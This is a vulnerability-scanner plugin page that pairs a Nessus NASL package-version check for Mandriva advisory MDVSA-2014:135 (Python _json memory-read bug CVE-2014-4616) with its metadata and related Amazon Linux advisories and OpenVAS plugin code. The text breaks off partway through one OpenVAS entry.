Mandriva Linux Security Advisory : python (MDVSA-2014:135)
2014-07-11T00:00:00
ID MANDRIVA_MDVSA-2014-135.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 Tenable Network Security, Inc. Modified 2021-01-06T00:00:00
Description
Updated python and python-simplejson packages fix a security vulnerability.
Python is susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used as an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616). According to the upstream bug report, the attacker must be able to control or influence both arguments of scanstring: the string to be decoded and the index.
This issue also affected the python-simplejson package, which has been patched to fix the bug.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandriva Linux Security Advisory MDVSA-2014:135.
# The text itself is copyright (C) Mandriva S.A.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Plugin metadata registration. This branch runs only when `description` is
# set; it registers identifiers, advisory text, scoring and prerequisites and
# then exits via exit(0), so none of the package checks below are reached.
if (description)
{
# Plugin identity and revision bookkeeping.
script_id(76471);
script_version("1.5");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# Cross-references that tie a finding back to the CVE, Bugtraq entry and
# vendor advisory.
script_cve_id("CVE-2014-4616");
script_bugtraq_id(68119);
script_xref(name:"MDVSA", value:"2014:135");
script_name(english:"Mandriva Linux Security Advisory : python (MDVSA-2014:135)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Mandriva Linux host is missing one or more security
updates."
);
# Advisory text, reproduced from MDVSA-2014:135 (see the file header).
# The wording, including its typos, is the vendor's and is left untouched.
script_set_attribute(
attribute:"description",
value:
"Updated python and python-simplejson package fixes security
vulnerability
Python are susceptible to arbitrary process memory reading by a user
or adversary due to a bug in the _json module caused by insufficient
bounds checking. The bug is caused by allowing the user to supply a
negative value that is used an an array index, causing the scanstring
function to access process memory outside of the string it is intended
to access (CVE-2014-4616).
This issue also affected the python-simplejson package, which has been
patched to fix the bug."
);
script_set_attribute(
attribute:"see_also",
value:"http://advisories.mageia.org/MGASA-2014-0285.html"
);
script_set_attribute(
attribute:"see_also",
value:"http://advisories.mageia.org/MGASA-2014-0286.html"
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
# Base vector: local access, low complexity, no authentication, partial
# confidentiality impact only (an information-disclosure issue).
# NOTE(review): AV:L rates this as locally exploitable only. Other advisories
# for CVE-2014-4616 score it with a network vector
# (AV:N/AC:M/Au:N/C:P/I:N/A:N); confirm which fits the deployment before
# using this score for prioritisation.
script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
# "local": the result is derived from data collected on the host, not from
# probing a network service.
script_set_attribute(attribute:"plugin_type", value:"local");
# CPE names for every package this plugin checks, plus the OS release.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64python-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64python2.7");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:python");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:python-docs");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:python-simplejson");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:tkinter");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:tkinter-apps");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:business_server:1");
script_set_attribute(attribute:"patch_publication_date", value:"2014/07/10");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/07/11");
script_end_attributes();
# Registered as an information-gathering check.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.");
script_family(english:"Mandriva Local Security Checks");
# Prerequisites: ssh_get_info.nasl must run first, and the knowledge-base
# keys listed here must exist. Presumably ssh_get_info.nasl is what fills the
# Host/* keys from an authenticated session; that plugin is not shown here.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
# Stop here in description mode; the check logic follows the block.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
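# Local package check for MDVSA-2014:135 (CVE-2014-4616).
#
# Reads the host facts stored in the knowledge base, audits out when a
# prerequisite is missing, then compares the installed RPMs against the fixed
# package versions from the advisory. Any hit is reported with security_note().
#
# NOTE(review): this is a package-version comparison only. It cannot tell
# whether Python processes that were already running have been restarted
# since the update, so a clean result does not prove the old _json code is no
# longer loaded anywhere.

# Prerequisites: local checks enabled, a Mandriva/Mandrake release string, and
# a collected RPM list. Each missing item ends the plugin with an audit trail.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
# OS name spelled "Mandrake" here, matching the architecture audit below, so
# both audit messages name the distribution consistently.
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandrake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Only x86-family architectures are handled; anything else is audited out.
# Every arch-specific reference below is x86_64, so on a 32-bit match only the
# arch-independent python-docs package is compared.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);

# Count the packages that rpm_check() reports against the fixed versions for
# release MDK-MBS1. Presumably rpm_check() flags a package when the installed
# version is older than the reference; the helper lives in rpm.inc, which is
# not shown here.
flag = 0;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"lib64python-devel-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"lib64python2.7-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"python-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", reference:"python-docs-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"python-simplejson-2.3.3-2.1.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"tkinter-2.7.3-4.7.mbs1")) flag++;
if (rpm_check(release:"MDK-MBS1", cpu:"x86_64", reference:"tkinter-apps-2.7.3-4.7.mbs1")) flag++;

# Report at note level on port 0; attach the RPM comparison report when the
# scan's verbosity asks for it. With no hits, record the host as not affected.
if (flag)
{
  if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());
  else security_note(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");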
{"id": "MANDRIVA_MDVSA-2014-135.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Mandriva Linux Security Advisory : python (MDVSA-2014:135)", "description": "Updated python and python-simplejson package fixes security vulnerability\n\nPython are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking. The bug is caused by allowing the user to supply a negative value that is used an an array index, causing the scanstring function to access process memory outside of the string it is intended to access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been patched to fix the bug.", "published": "2014-07-11T00:00:00", "modified": "2021-01-06T00:00:00", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/76471", "reporter": "This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.", "references": ["http://advisories.mageia.org/MGASA-2014-0286.html", "http://advisories.mageia.org/MGASA-2014-0285.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616"], "cvelist": ["CVE-2014-4616"], "immutableFields": [], "lastseen": "2022-04-16T14:07:40", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2014-374", "ALAS-2014-380"]}, {"type": "centos", "idList": ["CESA-2015:2101"]}, {"type": "cve", "idList": ["CVE-2014-4616"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-4616"]}, {"type": "fedora", "idList": ["FEDORA:096D7228ED", "FEDORA:4FCC221CAB", "FEDORA:79A3360CE877", "FEDORA:AE30560F3A00", "FEDORA:E272360D99E0", "FEDORA:F219C21A3D"]}, {"type": "gentoo", "idList": ["GLSA-201503-10"]}, {"type": "hackerone", "idList": ["H1:12297"]}, {"type": "ibm", "idList": ["6599DC93FFCF552D50A8FC9F31B71D111EC8AFA95F2B494C03ED7610CB908101", 
"A8F9E1B81DC06E155AA3018909D00AA443F0B83C885BE667CD9EB051536E7A27"]}, {"type": "nessus", "idList": ["ALA_ALAS-2014-374.NASL", "ALA_ALAS-2014-380.NASL", "CENTOS_RHSA-2015-2101.NASL", "EULEROS_SA-2019-1434.NASL", "FEDORA_2014-14208.NASL", "FEDORA_2014-14245.NASL", "FEDORA_2014-14257.NASL", "FEDORA_2014-7772.NASL", "FEDORA_2014-7800.NASL", "FEDORA_2014-8035.NASL", "GENTOO_GLSA-201503-10.NASL", "MANDRIVA_MDVSA-2015-075.NASL", "MANDRIVA_MDVSA-2015-076.NASL", "OPENSUSE-2014-458.NASL", "ORACLELINUX_ELSA-2015-2101.NASL", "REDHAT-RHSA-2015-2101.NASL", "SL_20151119_PYTHON_ON_SL7_X.NASL", "UBUNTU_USN-2653-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120402", "OPENVAS:1361412562310120575", "OPENVAS:1361412562310121364", "OPENVAS:1361412562310122760", "OPENVAS:1361412562310122870", "OPENVAS:1361412562310842261", "OPENVAS:1361412562310867929", "OPENVAS:1361412562310867978", "OPENVAS:1361412562310867987", "OPENVAS:1361412562310868464", "OPENVAS:1361412562310868482", "OPENVAS:1361412562310871501", "OPENVAS:1361412562311220191434"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1064", "ELSA-2015-2101"]}, {"type": "redhat", "idList": ["RHSA-2015:1064", "RHSA-2015:2101"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13867"]}, {"type": "ubuntu", "idList": ["USN-2653-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-4616"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2014-374"]}, {"type": "centos", "idList": ["CESA-2015:2101"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2014-4616"]}, {"type": "fedora", "idList": ["FEDORA:4FCC221CAB"]}, {"type": "hackerone", "idList": ["H1:12297"]}, {"type": "ibm", "idList": ["A8F9E1B81DC06E155AA3018909D00AA443F0B83C885BE667CD9EB051536E7A27"]}, {"type": "nessus", "idList": ["FEDORA_2014-7772.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121364"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-1064"]}, {"type": 
"redhat", "idList": ["RHSA-2015:2101"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13867"]}, {"type": "ubuntu", "idList": ["USN-2653-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-4616"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "pluginID": "76471", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:135. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76471);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"MDVSA\", value:\"2014:135\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python (MDVSA-2014:135)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python and python-simplejson package fixes security\nvulnerability\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. 
The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThis issue also affected the python-simplejson package, which has been\npatched to fix the bug.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0286.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python2.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python-simplejson\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python-devel-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64python2.7-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"python-docs-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"python-simplejson-2.3.3-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-2.7.3-4.7.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"tkinter-apps-2.7.3-4.7.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "cpe": ["p-cpe:/a:mandriva:linux:lib64python-devel", "p-cpe:/a:mandriva:linux:lib64python2.7", 
"p-cpe:/a:mandriva:linux:python", "p-cpe:/a:mandriva:linux:python-docs", "p-cpe:/a:mandriva:linux:python-simplejson", "p-cpe:/a:mandriva:linux:tkinter", "p-cpe:/a:mandriva:linux:tkinter-apps", "cpe:/o:mandriva:business_server:1"], "solution": "Update the affected packages.", "nessusSeverity": "Low", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2014-07-10T00:00:00", "vulnerabilityPublicationDate": null, "exploitableWith": []}
{"amazon": [{"lastseen": "2021-09-27T19:39:49", "description": "**Issue Overview:**\n\nIt was <a href=\"http://bugs.python.org/issue21529\"</a>reported</a> that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n<i>The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.</i>\n\n \n**Affected Packages:** \n\n\npython-simplejson\n\n \n**Issue Correction:** \nRun _yum update python-simplejson_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 python-simplejson-debuginfo-3.5.3-1.7.amzn1.i686 \n \u00a0\u00a0\u00a0 python-simplejson-3.5.3-1.7.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 python-simplejson-3.5.3-1.7.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 python-simplejson-debuginfo-3.5.3-1.7.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python-simplejson-3.5.3-1.7.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-07-09T16:51:00", "type": "amazon", "title": "Low: python-simplejson", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-09-19T10:47:00", "id": "ALAS-2014-374", "href": "https://alas.aws.amazon.com/ALAS-2014-374.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-09-27T19:39:45", "description": "**Issue Overview:**\n\nIt was <a href=\"http://bugs.python.org/issue21529\">reported</a> that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n<i>The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. 
However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.</i>\n\n \n**Affected Packages:** \n\n\npython27\n\n \n**Issue Correction:** \nRun _yum update python27_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 python27-tools-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-test-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-debuginfo-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-libs-2.7.5-13.35.amzn1.i686 \n \u00a0\u00a0\u00a0 python27-devel-2.7.5-13.35.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 python27-2.7.5-13.35.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 python27-tools-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-libs-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-test-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-devel-2.7.5-13.35.amzn1.x86_64 \n \u00a0\u00a0\u00a0 python27-debuginfo-2.7.5-13.35.amzn1.x86_64 \n \n \n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2014-07-23T13:53:00", "type": "amazon", "title": "Medium: python27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4616"], "modified": "2014-09-19T10:51:00", "id": "ALAS-2014-380", "href": "https://alas.aws.amazon.com/ALAS-2014-380.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-03-17T23:01:24", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-374)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120575", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120575", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120575\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:53 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-374)\");\n script_tag(name:\"insight\", value:\"It was\");\n script_tag(name:\"solution\", value:\"Run yum update python-simplejson to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-374.html\");\n script_cve_id(\"CVE-2014-4616\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python-simplejson-debuginfo\", rpm:\"python-simplejson-debuginfo~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-simplejson\", 
rpm:\"python-simplejson~3.5.3~1.7.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-03-17T23:01:12", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-380)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4616"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120402", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120402\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:25:33 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-380)\");\n script_tag(name:\"insight\", value:\"It was reported that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process's arbitrary memory.Quoting the upstream bug report:The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.The bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code. Internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. 
